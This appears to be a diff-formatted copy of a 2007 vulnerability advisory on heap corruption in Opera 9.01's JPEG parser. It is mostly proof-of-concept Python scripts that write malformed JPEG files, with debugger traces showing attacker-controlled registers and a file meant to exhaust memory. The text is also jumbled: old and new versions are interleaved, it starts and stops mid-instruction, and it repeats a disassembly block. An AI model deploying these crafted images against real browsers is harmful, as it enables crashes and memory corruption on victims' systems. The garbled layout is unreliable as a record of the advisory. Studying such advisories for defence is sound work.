input -74E5D756 lea edi, dword ptr ds:[edx+2] -74E5D759 cmp ecx, edi -74E5D75B jnb short Opera_1.74E5D765 - -First bytes of this marker are readed in there. - -Go on.. - -74E5D7C2 mov dl, byte ptr ds:[eax+ecx] ; read eax + n -74E5D7C5 mov byte ptr ss:[ebp+ecx-40], dl ; new location -74E5D7C9 movzx edx, dl -74E5D7CC add ebx, edx -74E5D7CE inc ecx ; n+=1 -74E5D7CF cmp ecx, 10 ; until n > 16 -74E5D7D2 jb short Opera_1.74E5D7C2 -74E5D7D4 lea eax, dword ptr ds:[ebx+1] -74E5D7D7 mov dword ptr ss:[ebp-18], ebx -74E5D7DA push eax -74E5D7DB call Opera_1.751E8B75 ; Opera allocation function - -Several operations are made here, single stepping might be interesting, -to follow the read-in process. - -74E5D7E0 mov edi, eax -74E5D7E2 lea eax, dword ptr ds:[ebx+ebx] -74E5D7E5 push eax -74E5D7E6 mov dword ptr ss:[ebp-1C], edi -74E5D7E0 mov edi, eax -74E5D7E2 lea eax, dword ptr ds:[ebx+ebx] -74E5D7E5 push eax -74E5D7E6 mov dword ptr ss:[ebp-1C], edi -74E5D7E9 call Opera_1.751E8B75 ; Opera allocation function - -If you return here, the last procedures are made. - -74E5D8A7 mov eax, dword ptr ss:[ebp-18] -74E5D8AA add eax, 260 ; new allocation size -74E5D8AF push eax -74E5D8B0 call Opera_1.751E8B75 ; Opera allocation function - - 76709E57 push esi ; Size - 76709E58 push 0 ; Flags - 76709E5A push dword ptr ds:[768268C0] ; Handle - 76709E60 call dword ptr ds:[7671C1C0] ; ntdll.RtlAllocateHeap - - 6BB01414 lea edx, dword ptr ds:[esi+8] ; our "string" - 6BB01417 mov dword ptr ss:[ebp-10C], edx - 6BB0141D mov eax, dword ptr ds:[edx] - 6BB0141F mov dword ptr ss:[ebp-16C], eax - 6BB01425 mov ecx, dword ptr ds:[edx+4] - 6BB01428 mov dword ptr ss:[ebp-114], ecx - 6BB0142E mov edi, dword ptr ds:[ecx] ; ds:[41414141]=??? - - -Access violation when reading [41414141] - -EAX 41414141 -ECX 41414141 -EDX 5C9C9348 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -EBX 59110000 -ESP 578DEB6C -EBP 578DED8C -ESI 5C9C9340 -EDI 0000004F -EIP 3D3D142E ntdll.3D3D142E - -At this point we are able to control 4 bytes of EAX and ECX with two bytes, -defined in the JPEG file. -Somebody with a better understanding of the "Define Huffman Table" segment -can probably do more. There are several other issues in parsing this segment. -These routines are very nested and big, it would be a very time-consuming -research. - - - ************************************************** - - -Details - ntdll.RtlAllocateHeap() SOS vulnerability ---------------------------------------------------- - -The arrows mark the components whose datatypes are not properly validated by -Opera. This can lead to unexpected vulnerabilities depending on the function -flow. - -Segment: Start Of Scan (SOS) - -SOS: FF DA -Length: 00 0C -Components: 03 -Data of component: - - component number: 01 - - 4Bit DC table, 4Bit AC table: 00 - - - component number: 02 - - 4Bit DC table, 4Bit AC table: 11 - - - component number: 03 - - 4Bit DC table, 4Bit AC table: 11 - -In the next example we set the value of "Components" to 01, we also overwrite -the end of file with dump bytes. Note, that we also overwrite the JPEG end -marker FF D9. - -After executing this JPEG file with Opera, Opera immediatly allocates memory -until the max page size value is reached, but it doesn't stop. - -Note that some third party applications could also crash during this process, -in my case Antivir crashed with a "read memory" error. - - -# File: pavarotti.py -# ATTENTION, THIS COULD DAMAGE YOUR RUNNING SYSTEM! -bytes = [ - 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, - 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, - 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, - 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, - 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x01, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x41, - 0x41, 0x41, 0x41, 0x03, 0x41, 0x41, 0x41, 0x41, 0x11, 0x41, 0x41, 0x41, 0x41, - 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x01, 0x01, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0xFF, - 0xDA, 0x00, 0x0C, 0x01, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x11, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41] - -f = open(__file__+".jpg", "wb") -for byte in bytes: f.write("%c" % byte) -f.close() -print __file__+".jpg created! (%d bytes)" % len(bytes) -# eof - -F:\vulndev\Opera> python pavarotti.py -pavarotti.py.jpg created! (637 bytes) -F:\vulndev\Opera> opera pavarotti.py.jpg - - -As said, this could be also interesting on mobile phones with Opera Mini. The -user has no real control to kill the Opera process, which should result in a -phone reboot. This was not tested. - - - ************************************************** - - -Further vulnerabilities ------------------------ - -The arrows mark the components whose datatypes are not properly validated by -Opera. - - -Segment: Start Of Frame (SOF) - -SOF: FF C0 -Length: 00 11 -Strictness: 08 -Image Hori.: 00 01 -Image Vert.: 00 01 -Components: 03 -Data of component: - - component number: 01 - - 4Bit hori., 4Bit vert., sample factor: 22 - - Number of quantisation table: 00 <- - - - component number: 02 - - 4Bit hori., 4Bit vert., sample factor: 11 - - Number of quantisation table: 01 <- - - - component number: 03 - - 4Bit hori., 4Bit vert., sample factor: 11 - - Number of quantisation table: 01 <- - - -The item "Number of quantisation table" of the first component is changed to -FFh in the below file. - - -# File: sof-quanttable.py -bytes = [ - 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, - 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, - 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, - 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, - 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12, - 0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26, - 0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C, - 0x20, 0x26, 0x18, 0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B, - 0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - - 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, - 0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0xFF, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, - 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x01, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, - 0xDA, 0x00, 0x0C, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, - 0xB3, 0x00, 0x1F, 0xFF, 0xD9 ] - - -f = open(__file__+".jpg", "wb") -for byte in bytes: f.write("%c" % byte) -f.close() -print __file__+".jpg created! (%d bytes)" % len(bytes) -# eof - -F:\vulndev\Opera> python sof-quanttable.py -sof-quanttable.py.jpg created! (304 bytes) -F:\vulndev\Opera> - - -(ntdll) -7C9211D5 mov eax, dword ptr ds:[esi+C] -7C9211D8 mov dword ptr ss:[ebp-98], eax -7C9211DE mov edx, dword ptr ds:[eax] ; <-- CRASH - -EAX 01010101 -ECX 00EB2780 -EDX 00930178 -EBX 00930000 -ESP 0012EC94 -EBP 0012EEB4 -ESI 00EB2778 -EDI 01010101 -EIP 7C9211DE ntdll.7C9211DE - ----- - -Segment: Start Of Scan (SOS) - -SOS: FF DA -Length: 00 0C -Components: 03 -Data of component: - - component number: 01 - - 4Bit DC table, 4Bit AC table: 00 <- - - - component number: 02 - - 4Bit DC table, 4Bit AC table: 11 <- - - - component number: 03 - - 4Bit DC table, 4Bit AC table: 11 <- - - -The item "4Bit DC table, 4Bit AC table" of the first component is changed to -FFh in the below file. - -# File: sos-dcactable.py -bytes = [ - 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, - 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, - 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, - 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, - 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12, - 0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26, - 0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C, - 0x20, 0x26, 0x18, 0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B, - 0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, - 0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, - 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x01, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, - 0xDA, 0x00, 0x0C, 0x03, 0x01, - 0xFF, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, - 0xB3, 0x00, 0x1F, 0xFF, 0xD9 ] - - -f = open(__file__+".jpg", "wb") -for byte in bytes: f.write("%c" % byte) -f.close() -print __file__+".jpg created! (%d bytes)" % len(bytes) -# eof - -F:\vulndev\Opera> python sos-dcactable.py -sos-dcactable.py.jpg created! (304 bytes) -F:\vulndev\Opera> - - -67AEE715 push ebp -67AEE716 mov ebp, esp -67AEE718 push esi -67AEE719 mov esi, ecx -67AEE71B cmp dword ptr ds:[esi+48], 8 -67AEE71F jge short Opera_12.67AEE733 -67AEE721 push dword ptr ss:[ebp+8] -67AEE724 call Opera_12.67AEE7FE -67AEE729 cmp dword ptr ds:[esi+48], 8 -67AEE72D jge short Opera_12.67AEE733 -67AEE72F push 1 -67AEE731 jmp short Opera_12.67AEE75E -67AEE733 mov eax, dword ptr ds:[esi+44] ; ds=B3001F00 (end part of jpeg file) -67AEE736 mov ecx, dword ptr ds:[esi+24] -67AEE739 shr eax, 18 -67AEE73C add eax, ecx ; -67AEE73E movzx ecx, byte ptr ds:[eax+60] ; <-- CRASH - -EAX 000000B2 -ECX FFFFFFFF -EDX 00EE2534 -EBX 00000005 -ESP 0012ECB0 -EBP 0012ECB4 -ESI 00EE2534 -EDI 00EE2534 -EIP 67AEE73E Opera_12.67AEE73E - - - ************************************************** - -# milw0rm.com [2007-01-08] +Opera JPEG processing - Heap corruption vulnerabilities +======================================================= +Date..: 8th September 2006 + 31th October 2006 (update) + 3rd November 2006 (update) + 5th January 2007 (public release) + +http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=457 + +Author: posidron + +Application: Opera 9.01 Build 8552 +Environment: Windows XP Professional, Service Pack 2 - DE + + +Preamble +======== + +Opera is vulnerable in parsing the JPEG file format. Discovered were four +vulnerabilities, each in different segments of the file format. I will +describe in this advisory the two important ones. + +1 - ntdll.RtlAllocateHeap() DHT vulnerability +2 - ntdll.RtlAllocateHeap() SOS vulnerability + +Opera Mini for mobile phones could be vulnerable also. The second bug looks +very interesting to this topic. + + +Details +======= + +The following code produces the sample image on which all further operations +are made. It's a valid image which was generated with Adobe Photoshop. + +Properties +---------- + + Type : JPEG + Size : 1px x 1px + Compression: Low + Colors: : None + Filesize : 304 bytes + + +# File: sample.py +bytes = [ + 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, + 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, + 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, + 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, + 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12, + 0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26, + 0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C, + 0x20, 0x26, 0x18, 0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B, + 0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, + 0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, + 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x01, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, + 0xDA, 0x00, 0x0C, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, + 0xB3, 0x00, 0x1F, 0xFF, 0xD9 ] + +f = open(__file__+".jpg", "wb") +for byte in bytes: f.write("%c" % byte) +f.close() +print __file__+".jpg created! (%d bytes)" % len(bytes) +# eof + +F:\vulndev\Opera> python sample.py +sample.py.jpg created! (304 bytes) +F:\vulndev\Opera> + + + ************************************************** + + +Details - ntdll.RtlAllocateHeap() DHT vulnerability +--------------------------------------------------- + +Segment: Define Huffman Table (DHT) + +DHT..................: FF C4 +Length...............: 00 4B +Index................: 00 +Number of codes......: 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 +Sum of previous bytes: 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + +We change the above to the below: + +Number of codes......: 02 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Sum of previous bytes: 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + + +# File: heap.py +bytes = [ + 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, + 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, + 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, + 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, + 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12, + 0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26, + 0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C, + 0x20, 0x26, 0x18, 0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B, + 0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, + 0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, + + 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + + 0xFF, + 0xDA, 0x00, 0x0C, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, + 0xB3, 0x00, 0x1F, 0xFF, 0xD9 ] + +f = open(__file__+".jpg", "wb") +for byte in bytes: f.write("%c" % byte) +f.close() +print __file__+".jpg created! (%d bytes)" % len(bytes) +# eof + +F:\vulndev\Opera> python heap.py +heap.py.jpg created! (304 bytes) +F:\vulndev\Opera> + + + +Analyse - ntdll.RtlAllocateHeap() DHT vulnerability +--------------------------------------------------- + +The call stack is very large, I think here is a good place to start: + +74E5D637 call dword ptr ds:[eax+4] ; set hardware bp on execution + +it's the 6th function from the top of the "crash" call stack. Restart Olly, +press F9 until Opera shows up again. + +Hit F7 until: + +74E610B6 mov bl, byte ptr ds:[eax+1] ; set hardware bp on execution + +Hit F9 until the following shows up in the panel, at this statement: + +ds:[543502E9]=C4 ('Ä') +bl=00 + +That's the marker of the "Define Huffman Table" segment. +Go on with F9, you will reach again: + +call dword ptr ds:[eax+4] + +Hit again F9, Opera shows up, drag the image into Opera. +You will reach again: + +call dword ptr ds:[eax+4] + +Hit F9 until you reached: + +74E610B6 mov bl, byte ptr ds:[eax+1] + +Hit F9 until the following shows up in the panel, at this statement: + +ds:[543502E9]=C4 ('Ä') +bl=00 + +Hit F7 to continue. + +74E5D735 push ebp +74E5D736 mov ebp, esp +... +74E5D750 mov dh, byte ptr ds:[eax+2] ; user input +74E5D753 mov dl, byte ptr ds:[eax+3] ; user input +74E5D756 lea edi, dword ptr ds:[edx+2] +74E5D759 cmp ecx, edi +74E5D75B jnb short Opera_1.74E5D765 + +First bytes of this marker are readed in there. + +Go on.. + +74E5D7C2 mov dl, byte ptr ds:[eax+ecx] ; read eax + n +74E5D7C5 mov byte ptr ss:[ebp+ecx-40], dl ; new location +74E5D7C9 movzx edx, dl +74E5D7CC add 